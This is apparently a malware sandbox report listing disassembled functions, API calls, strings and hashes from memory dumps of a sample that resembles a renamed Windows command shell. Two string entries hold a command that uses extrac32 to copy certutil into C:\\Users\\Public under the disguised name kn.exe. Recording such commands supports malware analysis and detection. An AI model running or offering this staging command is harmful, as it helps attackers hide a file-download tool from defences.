                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentFormatMessageThread
                                                                                                  • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                  • API String ID: 2411632146-3173542853
                                                                                                  • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                  • Instruction ID: ac4c38d14630c56fe9929e5f62f2ccda7ed27d6d5b1af9f2374a9233aa42ee7d
                                                                                                  • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                  • Instruction Fuzzy Hash: 3F618C72A0964282EA64EF51A4645B5A7A0FF44B86FE4113EDE0D03B54DFBCEA50CB20
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile_open_osfhandle
                                                                                                  • String ID: con
                                                                                                  • API String ID: 2905481843-4257191772
                                                                                                  • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                  • Instruction ID: e57ad09f283ae0080bcc3959904559ca1598c88aa943c1da17c19d13a083865d
                                                                                                  • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                  • Instruction Fuzzy Hash: 1471F9366086819AE360AF15E410379FBA0FB89B62FA44235DA5D43FD4DF7CD489CB20
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3829876242-3916222277
                                                                                                  • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                  • Instruction ID: 0482164adcc7bb0307b6bd79035dee3cb905b53062f9d2a002d757b89c67f809
                                                                                                  • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                  • Instruction Fuzzy Hash: 8161A626B0864286EA54AF11E42017DFBA0FFC9B56F958178DE0D07B94DF7CE845C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                  • String ID: CSVFS$NTFS$REFS
                                                                                                  • API String ID: 3510147486-2605508654
                                                                                                  • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                  • Instruction ID: 543bea88e147652afac942a4eb9095c94269ec4a17898ab9d36f3e418bd06fd5
                                                                                                  • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                  • Instruction Fuzzy Hash: 2C617232708BC2CAEBA19F21D8547E9B7A4FB45B86F944035DA0E4B758DFB8D544C720
                                                                                                  APIs
                                                                                                  • longjmp.MSVCRT(?,00000000,00000000,00007FF7823D7279,?,?,?,?,?,00007FF7823DBFA9), ref: 00007FF7823F4485
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: longjmp
                                                                                                  • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                  • API String ID: 1832741078-366822981
                                                                                                  • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                  • Instruction ID: b2caae009926fa7775563b742dbe570a1ffe3cf393c90a8ca08a74843ee67072
                                                                                                  • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                  • Instruction Fuzzy Hash: 7FC18320F0C64282EB64FB1565645B8A7A1BB46B86FF0507ADF0D67E91CFBCE845C360
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
                                                                                                    • Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD
                                                                                                  • memset.MSVCRT ref: 00007FF7823DBA2B
                                                                                                  • wcschr.MSVCRT ref: 00007FF7823DBA8A
                                                                                                  • wcschr.MSVCRT ref: 00007FF7823DBAAA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heapwcschr$AllocProcessmemset
                                                                                                  • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                  • API String ID: 2872855111-969133440
                                                                                                  • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                  • Instruction ID: 973aa397f690d5678325aab4eb33ddac06a36ebbd8bccdcfe62e715200c842c1
                                                                                                  • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                  • Instruction Fuzzy Hash: 78B1C465A0C742A1EA60AB15D06827DE7A1FF48B82FE50579CE5E43BD4DFBCE845C320
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                  • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                  • API String ID: 1606811317-2340392073
                                                                                                  • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                  • Instruction ID: e00860efbd9c473a3ea2c4e64931b4596ab5695a75c1331ce6ad4181642798bb
                                                                                                  • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                  • Instruction Fuzzy Hash: 8CD1D325E08B4281EA10AB15E8542B9B7A0FF45792FF4417ADE5D13BE8DFBCE845C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$ErrorLast$InformationVolume
                                                                                                  • String ID: %04X-%04X$~
                                                                                                  • API String ID: 2748242238-2468825380
                                                                                                  • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                  • Instruction ID: 6b1e7de7c1476dc56251e0df0b69927e56c78d98b626bb5d2138891ace3398d7
                                                                                                  • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                  • Instruction Fuzzy Hash: 08A1D422708BC18AEB65DF21D8502E9B7A1FB85B86F908035DA4D0BB89DF7CD645C720
                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7823E6570,?,?,?,?,?,?,00000000,00007FF7823E6488), ref: 00007FF7823E6677
                                                                                                  • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7823E6570,?,?,?,?,?,?,00000000,00007FF7823E6488), ref: 00007FF7823E668F
                                                                                                  • _errno.MSVCRT ref: 00007FF7823E66A3
                                                                                                  • wcstol.MSVCRT ref: 00007FF7823E66C4
                                                                                                  • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7823E6570,?,?,?,?,?,?,00000000,00007FF7823E6488), ref: 00007FF7823E66E4
                                                                                                  • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7823E6570,?,?,?,?,?,?,00000000,00007FF7823E6488), ref: 00007FF7823E66FE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                  • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                  • API String ID: 2348642995-441775793
                                                                                                  • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                  • Instruction ID: d34ee2cdc098a11bbbc706cc20f240ae443a7d5c78848314343d235add7fa717
                                                                                                  • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                  • Instruction Fuzzy Hash: E471826AD08A4695E7606F11D421179F7A0FB45B86FA4C079DA4E02E94EFBCA588CB20
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                  • String ID: FAT$~
                                                                                                  • API String ID: 2238823677-1832570214
                                                                                                  • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                  • Instruction ID: fc30206a72f3aeb723b97a568820c2fc98b46d0b2a1d774816f2cc26e7bdfb44
                                                                                                  • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                  • Instruction Fuzzy Hash: 1671E272708BC19AEB61DF20D8542E9B7A0FB45786FA04078DA4D4BB58DF7CD649C710
                                                                                                  APIs
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7823DFE2A), ref: 00007FF7823DD884
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7823DFE2A), ref: 00007FF7823DD89D
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7823DFE2A), ref: 00007FF7823DD94D
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7823DFE2A), ref: 00007FF7823DD964
                                                                                                  • _wcsnicmp.MSVCRT ref: 00007FF7823DDB89
                                                                                                  • wcstol.MSVCRT ref: 00007FF7823DDBDF
                                                                                                  • wcstol.MSVCRT ref: 00007FF7823DDC63
                                                                                                  • memmove.MSVCRT ref: 00007FF7823DDD33
                                                                                                  • memmove.MSVCRT ref: 00007FF7823DDE9A
                                                                                                  • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7823DFE2A), ref: 00007FF7823DDF1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1051989028-0
                                                                                                  • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                  • Instruction ID: c08579f29b1ec98021cca7196fcc318ea3dba72e64fa7971a2d768275d4e27e4
                                                                                                  • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                  • Instruction Fuzzy Hash: 8A02B373A0874981EB20AF15E42827AF7A1FB85B95FA44179DA8D03F94DFBCE445C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                  • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                  • API String ID: 3223794493-3086019870
                                                                                                  • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                  • Instruction ID: c78c9aefe6a8292bff6f8e364cba6bbe09cbacdefcc750e6c63abc50257d2d8d
                                                                                                  • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                  • Instruction Fuzzy Hash: B551C465A09B4296EB44BB15E414179BBA0FF49B52FB84178C91E077A0DFBCE845C730
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                  • API String ID: 0-3124875276
                                                                                                  • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                  • Instruction ID: 8b178debcb7473ae01a460edb649f8a65f6e5f24254e22ac98c752dc488b6dd8
                                                                                                  • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                  • Instruction Fuzzy Hash: 5051AE24A0864395FA507B21E4242B9BBA1BF44B47FE0407AC61E57EA5DFBCA849D730
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7823FC6DB), ref: 00007FF7823E58EF
                                                                                                    • Part of subcall function 00007FF7823E081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E084E
                                                                                                  • towupper.MSVCRT ref: 00007FF7823FC1C9
                                                                                                  • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FC31C
                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7823FC5CB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                  • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                                  • API String ID: 2242554020-619615743
                                                                                                  • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                  • Instruction ID: d36a381e16ac579321e2a686f4cf5f238d215a7b8ad130d07d3b50a602b96ca8
                                                                                                  • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                  • Instruction Fuzzy Hash: D412A321A5864281EE64FB15A42017AE3A0FF44BA2FE44679DD5E03BE0DFBCE945D730
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00007FF7823E7013
                                                                                                  • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E7123
                                                                                                    • Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3
                                                                                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E706E
                                                                                                  • wcsncmp.MSVCRT ref: 00007FF7823E70A5
                                                                                                  • wcsstr.MSVCRT ref: 00007FF7823EF9DB
                                                                                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EFA00
                                                                                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EFA5F
                                                                                                    • Part of subcall function 00007FF7823E823C: FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
                                                                                                    • Part of subcall function 00007FF7823E823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D
                                                                                                    • Part of subcall function 00007FF7823E3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823FEAC5,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823E3A56
